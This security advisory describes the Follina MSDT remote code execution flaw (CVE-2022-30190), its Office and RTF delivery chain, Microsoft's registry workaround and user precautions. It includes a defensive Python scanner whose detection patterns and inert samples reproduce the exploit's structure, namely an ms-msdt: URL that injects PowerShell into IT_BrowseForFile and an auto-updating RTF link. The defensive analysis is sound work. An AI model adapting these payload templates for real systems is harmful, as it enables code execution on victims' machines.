Microsoft disclosed a remote code execution (RCE) flaw in the Microsoft Support Diagnostic Tool (MSDT), tracked as CVE-2022-30190 and nicknamed "Follina". MSDT can be invoked through the ms-msdt: URL protocol handler from a calling application such as Word, and the diagnostic parameters carried in that URL are not sanitised, so an attacker who gets a crafted document onto a vulnerable workstation can run arbitrary code. Successful exploitation lets the attacker install software, read or alter data, and create new accounts, all with the rights of the victim user.
Follina is dangerous because of how little it takes to trigger it: a Word or RTF document whose embedded OLE object links out to an attacker-controlled HTML page, which in turn redirects to an ms-msdt: URL with the attacker's PowerShell in its parameters. No macros are involved, so macro blocking does not help.
Office documents are only one of several entry points. The same handler can be reached without Office at all: the attacker's HTML stage can be retrieved with a command-line tool such as wget or curl and the ms-msdt: link it carries handed to the Windows Diagnostic Engine directly.
Returning to the malicious document (which reaches a far larger audience), the mechanism is quite ingenious: the payload referenced by the file runs either when the document is opened or, for the RTF variant, as soon as Windows Explorer renders the file in the preview pane, without the user opening it at all.
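As an added example (not code from the original post or from Microsoft), the following Python script checks for the three static artefacts of the chain just described: an oleObject relationship that points outside a .docx package, an auto-updating htmlfile link inside an RTF, and the ms-msdt: call in the HTML stage. The sample files it builds are constructed and inert, and the hostname lure.invalid is a placeholder.

```python
"""Static triage for Follina-style lures.

Delivery chain: Office/RTF document -> external OLE link to attacker HTML
-> ms-msdt: URL with the payload in the diagnostic parameters.
Each stage leaves an artefact that can be checked without opening the file.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")

MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)
# Injection point used by Follina: a PowerShell subexpression in IT_BrowseForFile.
BROWSE_INJECT_RE = re.compile(rb"IT_BrowseForFile=\$\(", re.IGNORECASE)
# RTF linked object that refreshes itself and whose class is the HTML handler.
RTF_LINKED_OBJ_RE = re.compile(rb"\\objautlink|\\objupdate", re.IGNORECASE)
RTF_HTMLFILE_RE = re.compile(rb"\\objclass\s+htmlfile", re.IGNORECASE)


def scan_ooxml(data: bytes) -> list:
    """Flag oleObject relationships that point outside the package (.docx/.dotx)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                target = rel.get("Target", "")
                # Benign embedded objects live under embeddings/; Follina links to http(s).
                if rel.get("TargetMode") == "External" or re.match(r"(?i)https?://", target):
                    findings.append(f"{name}: external OLE link to {target}")
    return findings


def scan_html(data: bytes) -> list:
    """Flag the ms-msdt: stage (the HTML the document links to)."""
    findings = [f"ms-msdt: invocation at offset {m.start()}" for m in MSDT_RE.finditer(data)]
    if BROWSE_INJECT_RE.search(data):
        findings.append("PowerShell subexpression injected into IT_BrowseForFile")
    return findings


def scan_rtf(data: bytes) -> list:
    """Flag an auto-updating htmlfile link in RTF (fires from the Explorer preview pane)."""
    findings = []
    if RTF_HTMLFILE_RE.search(data) and RTF_LINKED_OBJ_RE.search(data):
        findings.append("RTF: auto-updating linked object of class htmlfile")
    return findings + scan_html(data)


def scan_bytes(data: bytes) -> list:
    """Dispatch on file magic: OOXML zip, RTF, or anything else treated as HTML/text."""
    if data.startswith(b"PK\x03\x04"):
        return scan_ooxml(data)
    if data.startswith(b"{\\rtf"):
        return scan_rtf(data)
    return scan_html(data)


# --- constructed, inert samples (no real payload, placeholder hostname) ---
def build_docx(rels_xml: str) -> bytes:
    """Minimal OOXML package containing just the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


MALICIOUS_RELS = (
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId9" Type="{OLE_REL_TYPE}" '
    'Target="http://lure.invalid/lure.html!" TargetMode="External"/>'
    "</Relationships>"
)
BENIGN_RELS = (
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="embeddings/oleObject1.bin"/>'
    "</Relationships>"
)
SAMPLE_RTF = (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objclass htmlfile}"
              b"{\\*\\objdata 01050000020000000900000068746d6c66696c65}}}")
SAMPLE_HTML = (b'<script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force '
               b'/param \\"IT_RebrowseForFile=cal?c IT_BrowseForFile=$(Invoke-Expression('
               b'\'Write-Host constructed-sample\'))\\"";</script>')

if __name__ == "__main__":
    for label, blob in [("docx", build_docx(MALICIOUS_RELS)),
                        ("benign docx", build_docx(BENIGN_RELS)),
                        ("rtf", SAMPLE_RTF), ("html", SAMPLE_HTML)]:
        print(label, scan_bytes(blob) or ["clean"])
```

The benign package shows why the check keys on the relationship target rather than on the mere presence of an OLE object: an embedded object under embeddings/ is ordinary, while an http(s) or External target in an oleObject relationship is the Follina signature.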
According to Microsoft, this vulnerability has been exploited in the wild and can allow a remote attacker to take control of a vulnerable system once the victim opens or previews the file. Proof-of-concept code for Follina is public and has been incorporated into common exploitation frameworks and tools.
Microsoft initially stated that Protected View would protect users, although at the time of writing no patch had been released. Researchers showed that Protected View is bypassed when the exploit is delivered as an RTF file and the file is rendered in the Explorer preview pane, because the preview pane does not apply Protected View.
In the absence of an official fix, Microsoft and the wider security community published workarounds. Microsoft's documented workaround disables the MSDT URL protocol: back up the HKEY_CLASSES_ROOT\ms-msdt registry key with reg export, then delete it with reg delete, so that Office has no handler to pass the link to; the key can be restored from the backup once the patch is installed. Security vendors have added detections, but further exploitation attempts are expected as more details and proof-of-concept exploits circulate. Microsoft later shipped a fix in the June 2022 security updates, so the workaround is a stopgap until that update is applied.
The exploit works against Office Pro Plus, Office 2013, Office 2016, Office 2019 and Office 2021, and there is evidence that the flaw was known to Microsoft before its public disclosure. Numerous files exploiting Follina have been found in the wild. Exploitation appears to have begun in April 2022, with users in India and Russia targeted through sextortion lures and fake interview requests.
Users should consistently observe the following:
1. Never open a file sent by an unknown sender.
2. Do not disable Protected View for documents downloaded from the internet or received by email unless absolutely necessary.
3. Do not open .rtf files downloaded from the internet, and turn off the Explorer preview pane so they are not rendered automatically either.
4. Until the patch is installed, apply Microsoft's workaround of disabling the ms-msdt: URL protocol handler, and restore it afterwards.